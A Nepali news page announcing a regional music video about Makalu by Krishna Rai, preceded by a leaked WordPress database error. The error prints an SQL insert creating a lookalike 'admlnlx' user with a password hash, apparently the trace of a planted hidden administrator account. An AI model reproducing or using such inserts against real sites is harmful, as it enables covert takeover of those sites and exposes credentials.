WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPkiQyg3GxUTzQnegv71z83veel9W81', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-22 12:30:16', '', 'admlnlx', 'admlnlx')
गाउँले न्युज — काठमाडौं, मकालुलाई साक्षी राखी गीतको भिडियो सार्बजनिक गरिएको छ ।
बहु प्रतिभाशालि गायक तथा संगीतकार कृष्ण राईको संगीत तथा आवाजमा रेकर्ड भएको गीत आज कृष्ण राई युटयुब च्यानल बाट सार्बजनिक गरिएको छ । सि.बि.कुलुङले रचना गरेको गीत आफनो जन्म भुमी प्रतिको पे्रमलाई ब्यत्त गरेका छन ।
उत्त गीतमा मकालु, संखुवासभा लाई बर्णन गरिएको छ । क्षेत्रिय गीत भएता पनि राष्ट्रिय भावनाले ओतप्रोत भएको छ यो गीत, राष्ट्रलाई माया गर्ने जो सुकै श्रोताको मनमा यो गीत रहने दाबि गरेका छन गायक तथा संगीतकार कृष्ण राई र गीतकार सि.बि. कुलुङले । यो गीतमा बुद्ध स्याङबाको एरेन्ज, गंगा राम राईको छायाँकन तथा सम्पादन रहेको छ भने आर.डि.कुलुङको बिशेष सहयोग रहेको छ ।
भिडियो हेर्नको लागी यहाँ क्लिक गर्नु होला ।
https://gaulenews.com/?p=46776